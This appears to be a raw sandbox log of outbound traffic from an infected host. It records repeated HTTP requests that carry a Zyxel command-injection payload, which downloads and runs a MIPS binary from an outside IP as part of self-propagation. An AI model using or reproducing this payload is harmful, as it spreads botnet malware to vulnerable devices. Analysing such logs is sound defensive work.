                                                        Feb 2, 2024 06:21:06.876627922 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3665192.168.2.1453146178.244.235.247443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:06.876662016 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3666192.168.2.1453466190.232.6.212443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:06.876683950 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3667192.168.2.1452454151.125.118.42443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:06.876713991 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3668192.168.2.144118212.218.115.77443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:06.876749992 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3669192.168.2.145249013.6.68.203443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:06.876806021 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3670192.168.2.1439956134.46.239.82443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:06.876832962 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3671192.168.2.1459118161.6.25.1443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:06.876866102 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3672192.168.2.1445836176.31.168.130443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:06.876920938 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3673192.168.2.144456286.61.29.145443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:06.876955032 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3674192.168.2.14604184.77.135.62443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:06.877013922 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3675192.168.2.14371725.95.207.222443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:06.877043962 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3676192.168.2.1434612198.138.230.5443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:06.877078056 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3677192.168.2.143432270.159.216.199443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:06.877125978 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3678192.168.2.1433500177.153.37.196443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:06.877166033 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3679192.168.2.144986092.223.50.65443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:06.877217054 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3680192.168.2.1440042116.9.238.78443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:06.877229929 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3681192.168.2.144187098.122.63.15443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:06.877279043 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3682192.168.2.1446656136.60.115.249443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:06.877329111 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3683192.168.2.1434448195.37.197.39443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:06.877357006 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3684192.168.2.144492860.182.101.161443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:06.877388000 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3685192.168.2.143860271.90.225.158443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:06.877439022 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3686192.168.2.145445846.169.239.193443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:06.877477884 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3687192.168.2.1455272161.30.71.137443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:06.877521038 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3688192.168.2.1435144161.34.106.185443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:06.877566099 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3689192.168.2.145773685.98.135.30443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:06.877588034 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3690192.168.2.1446564200.86.216.142443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:06.877649069 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3691192.168.2.145532058.246.2.127443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:06.877686977 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3692192.168.2.1434966129.201.215.56443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:06.877717972 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3693192.168.2.1457610192.100.224.9443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:06.877763033 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3694192.168.2.1443392189.68.136.251443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:06.877796888 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3695192.168.2.145645872.105.97.146443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:06.877826929 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3696192.168.2.143320892.106.68.55443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:06.877881050 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3697192.168.2.1454774198.132.3.88443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:06.877906084 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3698192.168.2.143308054.103.5.81443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:06.877943993 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3699192.168.2.145182648.20.225.72443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:06.877990961 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3700192.168.2.145011262.158.64.72443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:06.878037930 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3701192.168.2.145392462.55.136.77443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:06.878067970 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3702192.168.2.145254073.249.238.0443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:06.878113031 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3703192.168.2.1449954173.192.43.11443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:06.878142118 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3704192.168.2.144839047.252.143.169443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:06.878192902 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3705192.168.2.1451686184.73.228.66443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:06.878210068 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3706192.168.2.1455364195.250.40.161443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:06.878243923 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3707192.168.2.144026034.143.253.40443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:06.878288031 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3708192.168.2.1453316165.39.118.57443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:06.878319025 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3709192.168.2.1444060190.43.223.16443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:06.878346920 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3710192.168.2.1442668205.127.223.54443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:06.878395081 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3711192.168.2.145680446.66.82.242443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:06.878447056 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3712192.168.2.1443276184.10.152.96443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:06.878487110 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3713192.168.2.1459688156.97.96.80443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:06.878518105 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3714192.168.2.1446626149.225.144.211443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:06.878576040 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3715192.168.2.143659435.195.166.239443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:06.878614902 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3716192.168.2.1437902111.101.205.222443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:06.878645897 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3717192.168.2.14540762.249.242.131443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:06.878680944 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3718192.168.2.1443048176.139.207.30443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:06.878715992 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3719192.168.2.1434808155.64.199.85443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:06.878748894 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3720192.168.2.144837899.140.206.127443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:06.878798962 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3721192.168.2.1439906121.22.92.29443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:06.878853083 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3722192.168.2.143879280.244.145.246443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:06.878875017 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3723192.168.2.1443426116.200.50.204443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:06.878943920 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3724192.168.2.1438630179.81.154.251443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:06.878982067 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3725192.168.2.144787075.237.52.162443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:06.879013062 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3726192.168.2.1439512157.214.202.160443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:06.879039049 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3727192.168.2.1456646149.97.35.83443
                                                        TimestampBytes transferredDirectionData
